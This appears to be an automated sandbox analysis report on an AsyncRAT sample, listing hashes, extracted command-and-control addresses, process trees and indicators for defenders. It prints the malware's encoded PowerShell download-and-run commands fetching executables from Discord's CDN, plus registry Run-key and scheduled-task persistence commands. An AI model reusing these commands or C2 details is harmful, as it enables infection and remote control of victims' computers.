asyncrat | c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

max time kernel
144s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2022 21:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RustExternal_nls.exe
Size

658KB
MD5

1ab8dbca5e2bba39723f00907d266de7
SHA1

729cb808637568f20ac886b3fac5f3cf5ff01dee
SHA256

c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac
SHA512

d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081
SSDEEP

12288:3oSO5i2eVUIvybKcEz4MM7S9HdKINesX7j6p9PI8GS0oN2:3ouTVUIvtH4H7aLeO23gRoY

Score

10^/10

asyncrat defendersmartscren derenderscuriry system guard runtime uwuiscomic persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

UWUISCOMIC

20.100.196.69:9281

Mutex

UWUISCOMIC

Attributes

delay
3
install
false
install_file
DerenderScuriry
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DerenderScuriry

20.100.196.69:9281

Mutex

DerenderScuriry

Attributes

delay
3
install
false
install_file
DerenderScuriry
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 4 IoCs

rat

resource	yara_rule
behavioral2/memory/2252-259-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4976-302-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4496-340-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/2852-348-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
40	4228	powershell.exe
48	1604	powershell.exe
58	1188	powershell.exe
65	1592	powershell.exe
66	4672	powershell.exe
72	3900	powershell.exe
74	1848	powershell.exe
81	360	powershell.exe
86	1948	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 23 IoCs

pid	Process
4972	DEFENDERFILESECURITY.EXE
3244	0.exe
3676	oLjOmZogsf.exe
1456	GzFtaFpoIp.exe
4404	svchost.exe
2876	schtasks.exe
1744	dSRkUrgMFv.exe
2316	tWut9PTgX5.exe
3268	KOVSiCQjEa.exe
2300	w47Z6QOWuW.exe
4064	4bgciL2q05.exe
1072	CuJy5ycumB.exe
3100	QbFMU9R2KB.exe
4300	1.exe
2620	2.exe
2688	3.exe
4228	4.exe
1612	5.exe
2032	6.exe
4232	7.exe
1880	2.exe
2448	8.exe
4016	9.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000022f57-141.dat	upx
behavioral2/files/0x0007000000022f57-142.dat	upx
behavioral2/memory/4972-144-0x00007FF705ED0000-0x00007FF70602F000-memory.dmp	upx
behavioral2/memory/4972-146-0x00007FF705ED0000-0x00007FF70602F000-memory.dmp	upx
behavioral2/files/0x000200000001e57e-148.dat	upx
behavioral2/files/0x000200000001e57e-149.dat	upx
behavioral2/memory/3244-150-0x00007FF6DF800000-0x00007FF6DF963000-memory.dmp	upx
behavioral2/memory/3244-219-0x00007FF6DF800000-0x00007FF6DF963000-memory.dmp	upx

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	dSRkUrgMFv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	tWut9PTgX5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	KOVSiCQjEa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	CuJy5ycumB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	oLjOmZogsf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	GzFtaFpoIp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	w47Z6QOWuW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	4bgciL2q05.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	QbFMU9R2KB.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WProtecMscv = "C:\\Users\\Admin\\AppData\\Roaming\\WProtecMscv\\WProtecMscv.exe"	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4016 set thread context of 2524	4016	RustExternal_nls.exe	79
PID 4300 set thread context of 2252	4300	1.exe	151
PID 2688 set thread context of 4976	2688	3.exe	166
PID 2620 set thread context of 2452	2620	2.exe	172
PID 4232 set thread context of 4496	4232	7.exe	181
PID 2032 set thread context of 2852	2032	6.exe	185

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2348	4228	WerFault.exe	168
1268	4016	WerFault.exe	187

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2876	schtasks.exe
2204	schtasks.exe
980	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
4016	RustExternal_nls.exe
4016	RustExternal_nls.exe
4228	powershell.exe
1604	powershell.exe
4228	powershell.exe
4228	powershell.exe
1188	powershell.exe
1188	powershell.exe
1592	powershell.exe
1592	powershell.exe
4672	powershell.exe
4672	powershell.exe
1604	powershell.exe
1604	powershell.exe
3900	powershell.exe
3900	powershell.exe
1188	powershell.exe
1848	powershell.exe
1848	powershell.exe
1948	powershell.exe
1948	powershell.exe
4672	powershell.exe
360	powershell.exe
360	powershell.exe
1592	powershell.exe
1848	powershell.exe
3900	powershell.exe
1056	powershell.exe
1056	powershell.exe
3216	powershell.exe
3216	powershell.exe
1948	powershell.exe
360	powershell.exe
1056	powershell.exe
3216	powershell.exe
4300	1.exe
4300	1.exe
4300	1.exe
4300	1.exe
4300	1.exe
4300	1.exe
760	powershell.exe
760	powershell.exe
760	powershell.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
4232	7.exe
4232	7.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	RustExternal_nls.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	4300	1.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	2620	2.exe
Token: SeDebugPrivilege	4232	7.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	4496	RegAsm.exe
Token: SeDebugPrivilege	2032	6.exe
Token: SeDebugPrivilege	2852	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4048	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 5092	4016	RustExternal_nls.exe	78
PID 4016 wrote to memory of 5092	4016	RustExternal_nls.exe	78
PID 4016 wrote to memory of 5092	4016	RustExternal_nls.exe	78
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 4016 wrote to memory of 2524	4016	RustExternal_nls.exe	79
PID 2524 wrote to memory of 4972	2524	RegAsm.exe	80
PID 2524 wrote to memory of 4972	2524	RegAsm.exe	80
PID 4972 wrote to memory of 1688	4972	DEFENDERFILESECURITY.EXE	84
PID 4972 wrote to memory of 1688	4972	DEFENDERFILESECURITY.EXE	84
PID 1688 wrote to memory of 3244	1688	cmd.exe	86
PID 1688 wrote to memory of 3244	1688	cmd.exe	86
PID 3244 wrote to memory of 460	3244	0.exe	87
PID 3244 wrote to memory of 460	3244	0.exe	87
PID 460 wrote to memory of 3676	460	cmd.exe	89
PID 460 wrote to memory of 3676	460	cmd.exe	89
PID 3676 wrote to memory of 4228	3676	oLjOmZogsf.exe	90
PID 3676 wrote to memory of 4228	3676	oLjOmZogsf.exe	90
PID 3244 wrote to memory of 1360	3244	0.exe	91
PID 3244 wrote to memory of 1360	3244	0.exe	91
PID 1360 wrote to memory of 1456	1360	cmd.exe	94
PID 1360 wrote to memory of 1456	1360	cmd.exe	94
PID 3244 wrote to memory of 1964	3244	0.exe	95
PID 3244 wrote to memory of 1964	3244	0.exe	95
PID 3244 wrote to memory of 3396	3244	0.exe	97
PID 3244 wrote to memory of 3396	3244	0.exe	97
PID 1964 wrote to memory of 4404	1964	cmd.exe	159
PID 1964 wrote to memory of 4404	1964	cmd.exe	159
PID 3244 wrote to memory of 4628	3244	0.exe	103
PID 3244 wrote to memory of 4628	3244	0.exe	103
PID 1456 wrote to memory of 1604	1456	GzFtaFpoIp.exe	100
PID 1456 wrote to memory of 1604	1456	GzFtaFpoIp.exe	100
PID 3244 wrote to memory of 4504	3244	0.exe	104
PID 3244 wrote to memory of 4504	3244	0.exe	104
PID 3396 wrote to memory of 2876	3396	cmd.exe	148
PID 3396 wrote to memory of 2876	3396	cmd.exe	148
PID 4628 wrote to memory of 1744	4628	cmd.exe	106
PID 4628 wrote to memory of 1744	4628	cmd.exe	106
PID 4404 wrote to memory of 1188	4404	svchost.exe	107
PID 4404 wrote to memory of 1188	4404	svchost.exe	107
PID 3244 wrote to memory of 4208	3244	0.exe	109
PID 3244 wrote to memory of 4208	3244	0.exe	109
PID 4504 wrote to memory of 2316	4504	cmd.exe	112
PID 4504 wrote to memory of 2316	4504	cmd.exe	112
PID 3244 wrote to memory of 3084	3244	0.exe	113
PID 3244 wrote to memory of 3084	3244	0.exe	113
PID 2876 wrote to memory of 1592	2876	schtasks.exe	136
PID 2876 wrote to memory of 1592	2876	schtasks.exe	136
PID 1744 wrote to memory of 4672	1744	dSRkUrgMFv.exe	117
PID 1744 wrote to memory of 4672	1744	dSRkUrgMFv.exe	117
PID 3244 wrote to memory of 3748	3244	0.exe	116
PID 3244 wrote to memory of 3748	3244	0.exe	116
PID 4208 wrote to memory of 3268	4208	cmd.exe	119
PID 4208 wrote to memory of 3268	4208	cmd.exe	119
PID 2316 wrote to memory of 3900	2316	tWut9PTgX5.exe	120
PID 2316 wrote to memory of 3900	2316	tWut9PTgX5.exe	120
PID 3244 wrote to memory of 4468	3244	0.exe	123

C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
"C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  PID:5092
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
    "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\system32\cmd.exe
      "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1688
    - - C:\Users\Admin\AppData\Local\Temp\0.exe
        
        C:\Users\Admin\AppData\Local\Temp\0.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3244
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\oLjOmZogsf.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:460
        
        C:\Users\Admin\AppData\Local\Temp\oLjOmZogsf.exe
        
        C:\Users\Admin\AppData\Local\Temp\oLjOmZogsf.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUANgA2ADUAMwAxADYANAAwADgAOAAxADMAOQA4ADEANwAvADEAMAA1ADYANgA1ADMANwAxADQAMQAzADcANQA1ADUAMAAwADQALwBDAFIALgBlAHgAZQAnACwAIAA8ACMAbgBsAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAHcAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAHIAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApACkAPAAjAGcAZABoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHoAbABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGYAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApADwAIwB6AGgAdgAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:760
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Executes dropped EXE
        Creates scheduled task(s)
        Suspicious use of WriteProcessMemory
        
        PID:2876
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:2784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:780
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:3816
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:2252
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\GzFtaFpoIp.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\GzFtaFpoIp.exe
        
        C:\Users\Admin\AppData\Local\Temp\GzFtaFpoIp.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADEANwA2ADYAOQA3ADYANwAxADkAOAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAcQBwAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGYAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAC4AZQB4AGUAJwApACkAPAAjAGsAZgB5ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AawB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAC4AZQB4AGUAJwApADwAIwB2AG4AcgAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1604
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "C:\Users\Admin\AppData\Roaming\2.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:2452
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\8wF2VXXp0G.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\8wF2VXXp0G.exe
        
        C:\Users\Admin\AppData\Local\Temp\8wF2VXXp0G.exe
        7⤵
        
        PID:4404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZAByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADMAMgAzADUAOAAyADAANwA2ADAAOQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGcAZwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB1AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwB3AHkAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQA8ACMAZABjAHIAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1188
        
        C:\Users\Admin\AppData\Roaming\3.exe
        
        "C:\Users\Admin\AppData\Roaming\3.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:2204
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:4976
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\NIduwYgK0u.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\NIduwYgK0u.exe
        
        C:\Users\Admin\AppData\Local\Temp\NIduwYgK0u.exe
        7⤵
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADUANgA0ADIAOQAzADEAOAAxADUANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGYAcgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQB1AHoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANAAuAGUAeABlACcAKQApADwAIwBhAHIAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAG0AYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBsAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANAAuAGUAeABlACcAKQA8ACMAbgB2AHEAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
        
        C:\Users\Admin\AppData\Roaming\4.exe
        
        "C:\Users\Admin\AppData\Roaming\4.exe"
        9⤵
        Executes dropped EXE
        
        PID:4228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 804
        10⤵
        Program crash
        
        PID:2348
      - C:\Windows\system32\cmd.exe
        
